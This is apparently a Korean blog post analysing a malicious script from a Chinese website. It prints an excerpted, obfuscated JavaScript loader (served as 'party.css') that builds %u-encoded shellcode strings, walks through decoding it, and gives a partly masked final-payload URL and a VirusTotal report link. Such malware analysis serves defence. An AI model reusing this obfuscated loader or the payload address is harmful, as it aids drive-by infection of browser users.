오랜만에 보는 악성 스크립트 !

제가 본 한 중국 사이트의 악성 스크립트 입니다 !

<script src='party.css'></script>

IE 버전을 확인한 이후에 위와 같은 스크립트에 연결 시켜 감염을 합니다 !

party.css 볼까요

var hua, hua1, hua2, hua3, hua4;

hua='\x25';    var kao='\x25';   var shit='\x25'; var jj=hua+'u'+'4B5B';  var cao='\x25';
 hua1='u';     kao+='u';    shit+='u';  var kk=hua+'u'+'CD36';  cao+='u';
hua2='58';    kao+='B';    shit+='B';  var ll=hua+'u'+'BD8F';  cao+='B';
 hua3=hua+hua1+'5';    kao+='D';    shit+='D';  var mm=hua+'u'+'E9D0';  cao+='DD';
hua4=hua3+'8'+'58%'+hua1+hua2+hua2; kao+='BC';       shit+='B';shit+='D'; var oo=hua+'u'+'FB7A';  cao+='7';

 var org='u2355%uBDBF%'+'u';
oah+='BDBC%u36BD%uD755%uE4B8%'+org+'5FBD%uD544%uD3D2'+shit+'%';

[중간 코드 생략]

oah+='4D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%u';

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

짧막하게 한번 코드를 간추려서 써보았습니다.

첫번째 빨간색으로 되어있는 코드는 그대로 따라가주면 됩니다 !
여기서 \x25' 는 %25로서 % 을 의미 합니다.

두번째는 var org 로서 되어있는 코드를 모아 봅니다!
이번 스트립트는... var org1 부터 var org12 까지 모아져 있습니다.

그걸 전부 합치면 최종 코드가 짜잔 나옵니다....
이런건 노가다기 때문에 패쓰 합니다...

마지막 코드는

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

마지막이 역시 제일 중요합니다.
최종 파일을 쉽게 나오게 할 수 있는 힌트 입니다.

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

마지막인 코드를 들여다 보면 곧바로 최종파일 바로 받을 수 있습니다.

AHWM라는걸 본다면 쉽게풀수 있습니다.

AHWM 을 %u로 바꿔 줍니다.

%uADB7%u3Dbd3%u8d92%u[중간코드 생략]8c8f%ude93%ucece%ubdbd
이런식으로 접근하게 됩니다.

이와 같이

 

다시 Hex View 로 가서 디코딩을 한번 더 해주면 최종 파일에 접근 할 수 있습니다.

 

이와 같이 멀질라를 이용해서 파악만 하면 쉽게 최종 파일에 접근 할 수 있습니다.

최종 파일 : http://www.jx2xbxxx.com/dxf/021.css

바이러스 토탈 :

http://www.virustotal.com/file-scan/report.html?id=6a179b8d9d3837fa1ecc4b2331959631519e8216f85f1f7ee2e5b844d8d1980a-1311758547